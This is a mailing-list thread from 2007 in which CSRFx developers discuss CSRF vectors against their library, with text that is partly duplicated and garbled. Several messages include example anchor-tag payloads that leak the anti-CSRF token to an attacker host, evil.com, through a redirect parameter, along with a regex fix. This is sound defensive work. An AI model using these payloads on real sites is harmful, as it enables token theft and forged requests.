Vectors
22 views
Skip to first unread message
Gareth
Nov 23, 2007, 8:19:10 AM11/23/07
to CSRFx
I've started a very brief page on CSRF vectors, I shall add to this
and include my OpenID research. Please excuse the text at the moment
it will be expanded upon and improved with examples and more thorough
descriptions, I just wanted to start the ball rolling.
and include my OpenID research. Please excuse the text at the moment
it will be expanded upon and improved with examples and more thorough
descriptions, I just wanted to start the ball rolling.
Mario Heiderich
Nov 23, 2007, 4:03:20 PM11/23/07
to CSRFx
Hi!
Very nice work!
Do you think we should add the issue we discussed today too? It's been
a pretty specific problem of the CSRFx found by kuza55 and meanwhile
been fixed: If an URL matching the CSRFx GET patterns is being
attached to an arbitrary link as parameter the token would have been
added to the URL in the parameter causing token exposure and CSRF in
combination with a redirect. Example:
<a href='http://evil.com/?redirect_to= href="/csrfx/protected/get/
pattern"'>Don't click</a>
would have become...
<a href='http://evil.com/?redirect_to= href="/csrfx/protected/get/
pattern?t=5765EE58576A67F669C7689768689"'>Don't click</a>
..due to too tolerant regex.
Greetings,
.mario
Very nice work!
Do you think we should add the issue we discussed today too? It's been
a pretty specific problem of the CSRFx found by kuza55 and meanwhile
been fixed: If an URL matching the CSRFx GET patterns is being
attached to an arbitrary link as parameter the token would have been
added to the URL in the parameter causing token exposure and CSRF in
combination with a redirect. Example:
<a href='http://evil.com/?redirect_to= href="/csrfx/protected/get/
pattern"'>Don't click</a>
would have become...
<a href='http://evil.com/?redirect_to= href="/csrfx/protected/get/
pattern?t=5765EE58576A67F669C7689768689"'>Don't click</a>
..due to too tolerant regex.
Greetings,
.mario
Gareth
Nov 23, 2007, 5:23:46 PM11/23/07
to CSRFx
Yep it's good to collect all vector possible because they can be used
as a reference when testing the system.
On Nov 23, 9:03 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
as a reference when testing the system.
On Nov 23, 9:03 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
> Hi!
>
> Very nice work!
>
> Do you think we should add the issue we discussed today too? It's been
> a pretty specific problem of the CSRFx found by kuza55 and meanwhile
> been fixed: If an URL matching the CSRFx GET patterns is being
> attached to an arbitrary link as parameter the token would have been
> added to the URL in the parameter causing token exposure and CSRF in
> combination with a redirect. Example:
>
> <a href='http://evil.com/?redirect_to=href="/csrfx/protected/get/
>
> Very nice work!
>
> Do you think we should add the issue we discussed today too? It's been
> a pretty specific problem of the CSRFx found by kuza55 and meanwhile
> been fixed: If an URL matching the CSRFx GET patterns is being
> attached to an arbitrary link as parameter the token would have been
> added to the URL in the parameter causing token exposure and CSRF in
> combination with a redirect. Example:
>
> pattern"'>Don't click</a>
>
> would have become...
>
> <a href='http://evil.com/?redirect_to=href="/csrfx/protected/get/
>
> would have become...
>
Eduardo Vela
Nov 23, 2007, 8:21:43 PM11/23/07
to CSRFx
Hi guys.
I still think the solution made for the regexes is not enough, kuza55
just found some issues for links with backquotes, and well.. there are
some third level country code top level domains, that will allow
anyone on the same ccTLD to steal nonces.. :/ I think it should match
the whole domain, and not just the last 2.. maybe just changing to..
preg_match('/([\w.-]+)\//', $link, $submatches);
Greetz!!
I still think the solution made for the regexes is not enough, kuza55
just found some issues for links with backquotes, and well.. there are
some third level country code top level domains, that will allow
anyone on the same ccTLD to steal nonces.. :/ I think it should match
the whole domain, and not just the last 2.. maybe just changing to..
preg_match('/([\w.-]+)\//', $link, $submatches);
Greetz!!
kuz...@gmail.com
Nov 24, 2007, 5:44:29 AM11/24/07
to CSRFx
Regexes confuse me.....
Having said that, I think you forget IE in the sense that I think
(without having tested this) we can still do this: <a href=`http://
evil.com/?redirect_to=<a href="/csrfx/protected/get/pattern">test</
a>`>Don't click</a>
And yeah, what sirdarckcat said....
P.S. Regexes really confuse me....
Having said that, I think you forget IE in the sense that I think
(without having tested this) we can still do this: <a href=`http://
evil.com/?redirect_to=<a href="/csrfx/protected/get/pattern">test</
a>`>Don't click</a>
And yeah, what sirdarckcat said....
P.S. Regexes really confuse me....
Mario Heiderich
Nov 25, 2007, 4:23:26 PM11/25/07
to cs...@googlegroups.com
Hi!
I fixed the regex and it should cover unquoted and backtick-quoted markup too. But it's not tested yet. I think I will remove the only-non-ajax limitation too. More tomorrow!
Greetings,
.mario
I fixed the regex and it should cover unquoted and backtick-quoted markup too. But it's not tested yet. I think I will remove the only-non-ajax limitation too. More tomorrow!
Greetings,
.mario
2007/11/24, kuz...@gmail.com <kuz...@gmail.com>:
.ﻩﻨﺮﻪﺴ
Reply all
Reply to author
Forward
0 new messages